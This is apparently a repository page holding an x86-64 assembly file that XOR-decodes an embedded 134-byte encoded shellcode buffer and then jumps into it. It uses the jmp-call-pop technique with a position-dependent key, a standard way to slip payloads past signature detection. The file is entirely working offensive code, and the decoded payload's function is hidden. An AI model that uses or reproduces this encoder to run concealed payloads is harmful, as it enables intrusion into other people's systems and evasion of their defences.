-
Notifications
You must be signed in to change notification settings - Fork 24
Expand file tree
/
Copy pathXorShellcodeDecode.asm
More file actions
43 lines (33 loc) · 1.53 KB
/
XorShellcodeDecode.asm
File metadata and controls
43 lines (33 loc) · 1.53 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
BITS 64
section .text
global _start
_start:
jmp short _get_addr
_decoder:
pop rsi
push rsi
mov cl, BUFFER_SIZE
_loop:
mov al, cl
neg al
add al, XOR_KEY
add al, BUFFER_SIZE & 0xFF
xor byte [rsi], al
inc rsi
loop _loop
pop rsi
jmp rsi
_get_addr:
call _decoder
encoded_buffer:
db 0x66, 0x60, 0x60, 0x6D, 0x71, 0xB3, 0xDE, 0xD4, 0x3D, 0x3E, 0x3F, 0x40, 0x1F, 0x0A, 0xC0, 0x82
db 0x3F, 0xFD, 0x6F, 0x4A, 0x49, 0x4A, 0xC2, 0x93, 0x9C, 0xA1, 0x7E, 0x99, 0x68, 0xAB, 0x20, 0x74
db 0x5A, 0xE1, 0x53, 0x16, 0x18, 0xD2, 0x9B, 0x9D, 0xB5, 0x56, 0x1E, 0xE8, 0xA0, 0x23, 0xE3, 0x94
db 0xCE, 0x27, 0xA7, 0xA0, 0x6D, 0x2F, 0x43, 0xA4, 0x29, 0xE6, 0x6B, 0x7E, 0x8E, 0xB3, 0x98, 0xA8
db 0xFC, 0x8E, 0xF4, 0x98, 0x85, 0xBB, 0x93, 0x7E, 0x4C, 0xB7, 0x46, 0x41, 0xF2, 0x8F, 0x08, 0x90
db 0x0B, 0x47, 0x45, 0x98, 0x00, 0x9E, 0x05, 0x73, 0x4C, 0x65, 0x60, 0xC7, 0xC7, 0xDA, 0x1A, 0x64
db 0xDD, 0x97, 0x6F, 0xD0, 0x10, 0x63, 0xD3, 0xAD, 0x4F, 0xD6, 0x1A, 0x69, 0xD5, 0xA8, 0x2B, 0xB4
db 0xED, 0x59, 0x67, 0xE0, 0x56, 0x63, 0x40, 0x5D, 0xF3, 0xF1, 0xE7, 0x39, 0x5D, 0xEF, 0xEC, 0xFC
db 0x3C, 0x46, 0xE9, 0xE3, 0x46, 0x5A
BUFFER_SIZE equ 0x86 ; FIXED
XOR_KEY equ 0x35 ; CHANGES